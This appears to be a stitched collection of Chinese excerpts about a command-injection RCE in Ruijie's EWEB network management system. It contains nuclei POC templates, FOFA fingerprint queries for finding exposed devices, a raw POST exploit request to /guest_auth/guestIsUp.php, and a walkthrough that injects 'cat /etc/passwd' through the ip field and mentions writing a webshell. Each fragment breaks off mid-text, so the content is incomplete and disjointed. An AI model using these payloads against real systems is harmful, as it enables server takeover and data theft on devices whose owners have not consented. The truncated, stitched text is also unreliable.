基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml 代码语言:yaml 复制 id:ruijie-EWEB-auth-RCEinfo:name:auth接口存在RCE漏洞author:someoneseverity:criticaldescription:auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。reference:metadata:verified:truemax-request:1fofa-query:bo...
id:Ruijie-EWEB-auth-REC info:name:auth接口存在RCE漏洞,恶意攻击者可能会利用该漏洞执行恶意命令,进而导致服务器失陷。 author:WLF severity:high metadata:fofa-query:body="cgi-bin/luci"&&body="#f47f3e" variables: filename: "{{to_lower(rand_base(10))}}" boundary: "{{to_lower(rand_base(20))...
0x03 漏洞验证 访问锐捷EWEB网管系统界面,使用BurpSuite工具抓取数据包。 使用POST型数据包检测语句执行whoami命令,并将执行结果保存到test.txt中。 代码语言:javascript 代码运行次数:0 复制 Cloud Studio代码运行 POST/guest_auth/guestIsUp.php Content-Type:application/x-www-form-urlencoded mac=1&ip=127.0.0.1|...
锐捷-EWEB网管系统RCE FOFA: icon_hash="-692947551" EXP: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 127.0.0.1:9999 Connection: keep-alive Content-Length: 45 Pragma: no-cache Cache-Control: no-cache Accept: application/json, text/javascript, */*; q=0.01 Origin: http://127.0.0.1:9999...
# 锐捷-EWEB网管系统未公开RCE # 锐捷-EWEB网管系统RCE FOFA: @@ -90,4 +90,4 @@ if __name__ == '__main__': ref: https://forum.ywhack.com/thread-114888-1-1.html https://forum.ywhack.com/thread-114888-1-1.html 0 comments on commit f8a3372 Please sign in to comment. Foot...
锐捷NBR路由器EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt 利用此漏洞我们可以将一句话木马写入shell ...